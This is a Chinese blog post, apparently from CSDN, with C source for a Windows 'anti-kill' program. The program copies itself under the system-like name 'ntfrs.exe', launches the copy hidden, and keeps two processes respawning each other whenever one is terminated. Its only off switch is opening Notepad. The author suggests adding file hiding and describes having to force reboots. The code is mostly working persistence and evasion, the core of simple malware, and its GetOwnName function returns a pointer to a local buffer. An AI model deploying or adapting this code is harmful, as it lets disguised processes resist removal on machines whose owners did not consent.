C语言实现防杀进程

最新推荐文章于 2024-05-15 04:27:34 发布
最新推荐文章于 2024-05-15 04:27:34 发布
阅读量1k 收藏 10
点赞数 1
文章标签: c语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjz2005/article/details/104960184
版权

程序原理
很简单:弄俩进程,互相检测对方有没有被杀,被杀就再调一个,实现防杀效果。

原来我用了两个程序,但比较麻烦,就合并了,但是没有实现就自己运行的效果,只能自我复制一份。
可以把文件名改一下,但是要全部都改掉,包括最后的文件名检测。

源码

//防杀进程-示例 
#include <windows.h>
#include <tlhelp32.h>
#include <string.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>

#define CANCEL_PROCESS "notepad.exe" //退出条件 
HANDLE GetProcessHandle(DWORD pid)
{
     return OpenProcess(PROCESS_TERMINATE,FALSE, pid);
} 
HANDLE GetProcessHandle(LPCSTR name)
{    //*****警告!必须加扩展名!!!!*****// 
 HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 
    if (INVALID_HANDLE_VALUE == hSnapshot)  
    {  
      return NULL; 
    } 
    PROCESSENTRY32 pe = { sizeof(pe) }; 
 BOOL fOk; 
 for (fOk = Process32First(hSnapshot, &pe); fOk; fOk = Process32Next(hSnapshot, &pe))  
 {  
      if (!strcasecmp(pe.szExeFile, name))   
   {   
        CloseHandle(hSnapshot);   
     return GetProcessHandle(pe.th32ProcessID);  
      } 
    } 
 return NULL;
}//来自  https://blog.csdn.net/fzuim/article/details/60954959
BOOL HaveProcess(LPCSTR lpName)
{//*****警告!必须加扩展名!!!!*****// 
 return (GetProcessHandle(lpName) != NULL  ? true : false);
}
DWORD Daemon(UINT n) //n填自己
{
 HANDLE hp=NULL; 
 bool exist=false;
 STARTUPINFO si; 
    PROCESS_INFORMATION pi; 
    ZeroMemory(&si, sizeof(si)); 
    si.cb = sizeof(si); 
    ZeroMemory(&pi, sizeof(pi)); 
    
while(1) //使……不死 
{
    if(HaveProcess(CANCEL_PROCESS))
 { //没有这个会很尴尬的。 
       exit(0); 
    return 0;
    }
 if(HaveProcess(n == 1 ? "ntfrs.exe" : "daemon.exe"))
 {
  Sleep(100);
  continue;
 }
    else
    {
     if(!CreateProcess( NULL,(LPSTR)(n == 1 ? "ntfrs.exe" : "daemon.exe"),NULL,NULL,FALSE,0,NULL,NULL,&si,&pi))
     {
      MessageBox(NULL,"DaemonBirthFailed!","ERROR",0);
       exit(0);
       return 0;
  }
 }
 Sleep(100);
    WaitForSingleObject(pi.hProcess,INFINITE); //候之 
    CloseHandle(hp);
    ZeroMemory(&si, sizeof(si)); 
 ZeroMemory(&pi, sizeof(pi)); 
}//<-- REBORN
 exit(1);
 return 1;
}
void CopyMyselfTo(LPCSTR dst) {
 char path[MAX_PATH]; // 缓冲区
 GetModuleFileName(NULL,path,sizeof(path));
 CopyFile(path,dst,false);
}
LPSTR GetOwnName()
{
 char path[512];
 char drive[_MAX_DRIVE];
 char dir[_MAX_DIR];
 char fname[_MAX_FNAME];
 char ext[_MAX_EXT];
 strcpy(path,_pgmptr);
    _splitpath( (LPCSTR)_pgmptr, drive, dir, fname, ext );
       return fname;
}
int main(int argc,char *argv[])
{
 if(HaveProcess(CANCEL_PROCESS))
 {
  exit(0);
  return -1;
 }
 if(access("ntfrs.exe",0)) //初次运行
 {
  CopyMyselfTo("ntfrs.exe"); //弄个比较恶心的进程名
        WinExec("ntfrs.exe",SW_HIDE); //运行之
  Daemon(1); 
 }else{
   if(tolower(strlwr(GetOwnName())[0]) == 'd')
   { //取首字母。
       Daemon(1);
   }else{
       Daemon(2);
   }
 }
 return 0;
}

只有这一个程序。
但是运行后会生出一个ntfrs.exe,并运行,就开启了防杀功能。
(可以再加个隐藏文件的命令)

在任务管理器上可以看到这两个进程,杀了又生出来,很尴尬。。

为了取消它,专门设计了取消的条件:打开记事本(notepad)就自动退出。(可以自行修改条件)

后记
太尬了。我设计不复制版的程序时老是出错,还忘了用虚拟机,结果我不得不注销4次,强制重启一次(杀错了,杀成lsass了)。。
我原来还没有设计“检测进程是否已经存在”的语句,导致越杀越多,连360强制删除也不行。。。

可见关于调用进程BUG的危险性。

Wormwaker
关注
  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
C# 保护进程不被结束(源代码)
康康的小窝
06-25 1万+
闲来无事,英语又学的太痛苦。看到我妈妈电脑开起在,就坐上去看看新闻,听听音乐。哎,突然间,老毛病又烦了,想起原来一直有个编程的问题没有解决——禁止别人用任务管理器,结束自己的程序进程(.NET程序)。带着这个问题,我开始Google,开始baidu,又开始编程了。和原来的搜索结果一样,什么东西都是一筹莫展,得到的答案永远是:C#没有办法自己去禁止别人用任务管理器结束自己进程。不过功夫不负有心人。我
如何保证进程不被杀死的几个办法
lixuce1234的博客
06-05 8445
前言 开发一个需要常住后台的App其实是一件非常头疼的事情,不仅要应对国内各大厂商的ROM,还需要应对各类的安全管家…虽然不断的研究各式各样的方法,但是效果并不好,比如任务管理器把App干掉,服务就起不来了…  一般来说:有以下几种可行的方法来使自己的进程不被杀死 1、提高Service的优先级:这个,也只能说在系统内存不足需要回收资源的时候,优先级较高,不容易被回收,然
6种进程防杀方案和源码
woshiyipihaoma的专栏
09-27 5999
6种进程防杀方案和源码,windows操作系统,vc++2005源码,hookApi,钩子,驱动hook
操作系统的进程管理(c语言模拟)_操作系统用c语言实现作业进程内存管理
2401_85015172的博客
05-15 858
printf(“该执行进程占用cpu的时间为:%f\n”,p->zhantime);printf(“该执行进程的轮转时间为:%f\n”,p->luntime);printf(“该执行进程的的优先级:%d\n”,p->youxian);if(jiuxu==NULL) //如果就绪队列中没有进程的话。printf(“该执行进程的名字为:%d\n”,p->pid);printf(“请输入新进程的优先级:(数字)\n”);printf(“请输入新进程的优先级:(数字)\n”);//p为正在执行的进程
首创!用户级权限进程防杀 C++
Hnnnbhnnnb的博客
08-11 1154
用户级权限实现简单防杀 用户级权限实现简单防杀 无意中翻出小学时候写的程序,拿出来分享下。这个程序运行不需要任何权限,应该是为数不多的能抗住PChunter强制结束的用户级程序(除了双进程)。程序只有一个主程序,主程序通常情况下杀不掉,被保护的程序只要不在运行则创建一个进程。写的比较仓促还有很多不足,分享一下思路而已,利用获取进程句柄和结束进程之间的时差“更换”自己的pid和句柄来让对方只能找到上...
通过权限设置禁止用户在任务管理器中杀掉我们的进程
lbird
06-23 2609
通过权限设置禁止用户在任务管理器中杀掉我们的进程      以下代码仅供学习,俺不能保证代码完全正确,呵呵。代码中有用到的模板类CLocalMemoryT在后面会介绍!要说明的是,在XP下无效,2003还没试过!而且,即使在2000下也不是完全杀不死的,ntsd命令就可以杀死这类进程。#include "aclapi.h"#include "atlbase.h"BOOL DisableTe
C语言实现进程间通信原理解析
08-19
主要介绍了C语言实现进程间通信原理解析,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
C语言实现的onvif进程
12-25
标题 "C语言实现的onvif进程" 涉及到的是使用C语言在Linux操作系统上开发的一个程序,用于处理ONVIF协议相关的任务。ONVIF(Open Network Video Interface Forum,开放网络视频接口论坛)是一种全球性的开放标准,...
C语言实现查看进程是否存在的方法示例
08-29
"C语言实现查看进程是否存在的方法示例" 本文主要介绍了C语言实现查看进程是否存在的方法,涉及C语言针对进程操作的相关实现技巧。下面将详细说明标题和描述中所说的知识点。 首先,让我们了解什么是进程进程是...
操作系统进程管理实验(C语言实现
02-02
你需要考虑如何在C语言实现这些调度算法,模拟进程的执行过程。 此外,你还会接触到异常处理、死锁预防和检测等概念。例如,死锁是指两个或多个进程相互等待对方释放资源而无法继续执行的情况,需要通过适当的...
C语言实现kmp算法的C语言实现源码.zip
最新发布
05-16
C语言实现kmp算法的C语言实现源码.zipC语言实现kmp算法的C语言实现源码.zipC语言实现kmp算法的C语言实现源码.zipC语言实现kmp算法C语言实现kmp算法的C语言实现源码.zipC语言实现kmp算法的C语言实现源码.zipC语言实现...
VS 2017 C++ 防杀进程
07-22
此程序能让 NTSD、WMIC、TASKKILL、任务管理器等大多数进程结束工具无法结束本此程序(支持所有64位 Windows)。
三两行代码实现进程防杀,免驱动,IceSword,WSysCheck等无效.
KeSummer的专栏
05-18 1万+
其实这个已经是一个很老的技巧了,今天挖出来写到blog上。windows在强制结束进程的时候会先结束掉所有的线程,而结束线程调用的是:PspTerminateThreadByPointer,这个函数很有意思。看看就知道了。 它判断ETHREAD里面的CrossThreadFlags;的值,如果这个值等于PS_CROSS_THREAD_FLAGS_SYSTEM ,即是一个系统线程,那么直接返回拒
win2k下隐藏进程
超然楼
08-18 2005
win2k下隐藏进程 【关键词】:win2k下隐藏进程  录入:曾进 来源:huiyun.net 时间:2004-2-20 18:44:42 点击:62次 WINDOWS操作系统下,当我们无法结束或者不知道怎样结束一个程序的时候,或者是懒得去找“退出”按钮的时候,通常会按“CTRL+ALT+DEL”呼出
C\C++各路高手以及操作系统专家请进来杀死这个进程
lynch0571的专栏
06-21 2343
通常情况下编写一个程序,可以点击关闭按钮正常结束程序,也可以使用任务管理器结束任务,还可以使用taskkill等命令杀死进程,实在都不行也可以直接重启计算机。         但是,这些方法真的都管用吗?我觉得不一定,今天晚上闲着没事,想写一个杀不死的程序。设计思路如为写三个程序ProcessMain、Process1和Process2,相互保护,具体如下: 1、按照平时的方法
进程强杀探究
hongduilanjun的博客
03-07 2014
前言 我们知道在windows操作系统里面有ring0跟ring3的概念(ring1、ring2在windows中并未使用),因为ring0的特权级别是比ring3高的,那么我们肯定不能在ring3调用windows提供的api杀死ring0特权级别的进程,那么这时候我们就需要使用的ring0的函数来强行结束一些处于ring0级别的进程。 测试 我们首先打开PCHunter32.exe看一下,应用层是不能够访问的,我们知道可以在cmd里面使用taskkill命令来结束进程,但这种方式对ring0特权级别的程
避免后台进程被杀死的几种方法
热门推荐
Kitty_Landon的专栏
01-09 1万+
Android的几种进程 前台进程     即与用户正在交互的Activity或者Activity用到的Service等,如果系统内存不足时前台进程是最后被杀死的。 可见进程     可以是处于暂停状态(onPause)的Activity或者绑定在其上的Service,即被用户可见,但由于失去了焦点而不能与用户交互。 服务进程     其中运行着使用startService方法启动的S
【精品资料】C语言模拟进程管理.doc
07-02
【精品资料】C语言模拟进程管理

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值